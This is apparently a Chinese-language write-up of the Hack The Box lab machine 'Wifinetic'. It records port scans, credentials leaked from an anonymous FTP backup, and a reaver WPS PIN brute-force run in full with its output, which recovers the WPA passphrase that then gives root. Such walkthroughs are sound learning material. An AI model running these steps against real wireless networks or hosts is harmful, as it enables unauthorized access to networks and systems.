Wifinetic
Rescon
Ports
sudo nmap -sS -F wifinetic.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-13 14:26 CST
Nmap scan report for wifinetic.htb (10.129.229.90)
Host is up (0.11s latency).
Not shown: 97 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
Nmap done: 1 IP address (1 host up) scanned in 2.03 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-13 14:27 CST
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 64.67% done; ETC: 14:28 (0:00:34 remaining)
Nmap scan report for wifinetic.htb (10.129.229.90)
Host is up (0.11s latency).
Not shown: 97 closed udp ports (port-unreach)
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
Nmap done: 1 IP address (1 host up) scanned in 112.32 seconds
目标开放21端口,且支持anonymous登录,获得了数个文件。逐一浏览,在备份压缩文件中的etc文件夹下获取了目标泄露的用户netadmin和wifi无线密码。 尝试ssh登录成功登录。 存在53端口,尝试获取隐藏子域。无有效信息。 在capabilities下发现:
netadmin@wifinetic:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep
存在一个新东西reaver:一款开源的Wi-Fi破解工具,主要针对WPS协议的漏洞进行攻击。 它通过暴力破解WPS PIN码,最终获取无线网络的WPA/WPA2密码。 由下可知,存在接口监听接口mon0和AP wlan0。
netadmin@wifinetic:~$ iw dev
phy#2
Interface mon0
ifindex 7
wdev 0x200000002
addr 02:00:00:00:02:00
type monitor
txpower 20.00 dBm
Interface wlan2
ifindex 5
wdev 0x200000001
addr 02:00:00:00:02:00
type managed
txpower 20.00 dBm
phy#1
Unnamed/non-netdev interface
wdev 0x100000183
addr 42:00:00:00:01:00
type P2P-device
txpower 20.00 dBm
Interface wlan1
ifindex 4
wdev 0x100000001
addr 02:00:00:00:01:00
type managed
txpower 20.00 dBm
phy#0
Interface wlan0
ifindex 3
wdev 0x1
addr 02:00:00:00:00:00
ssid OpenWrt
type AP
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBm
在了解了一些使用命令后,尝试对现有ap:wlan0进行暴力破解。 BTW:其中phy为无线物理设备(Wireless PHY device)#x的网卡对应的物理层抽象表示。他代表一个无线芯片或无线硬件设备,其下的Interface是基于该 PHY 上创建的虚拟接口,如 wlan0、mon0 等。可知mon0与wlan2是同一个设备,wlan0是ap设备。 可知AP wlan0的BSSID为02:00:00:00:00:00。
etadmin@wifinetic:~$ iw dev wlan0 info
Interface wlan0
ifindex 3
wdev 0x1
addr 02:00:00:00:00:00
ssid OpenWrt
type AP
wiphy 0
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBm
使用reaver进行暴力破解ap的psk,-i 指定的是监听网卡的名称。
netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00 -vv
Reaver v1.6.5 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Switching mon0 to channel 1
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 2 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt' [
+] Nothing done, nothing to save.
获得了PSK,可借此登录root。
Summary
初次了解了Wireless Security。了解一些相关知识
| 工具 | 角色 | 功能描述 | 接口依赖 |
|---|---|---|---|
iw | 工具 | 接口配置与状态管理 | nl80211 |
wpa_supplicant | 客户端守护 | WPA/WPA2 客户端认证管理 | nl80211 |
hostapd | 服务端守护 | 搭建无线接入点(软AP) | nl80211 |
iwctl/iwd | 客户端管理 | 更现代的替代方案(非WPA) | nl80211 |
aircrack-ng | 渗透工具组 | 无线监听、攻击、破解 | nl80211 |
| BSSID 是一个唯一标识一个基本服务集合(BSS)的 MAC 地址,通常是无线接入点(AP)网卡的 MAC 地址。 |
| ESSID 是一个逻辑名称,用于标识一个无线网络(Extended Service Set),供客户端识别与连接。 |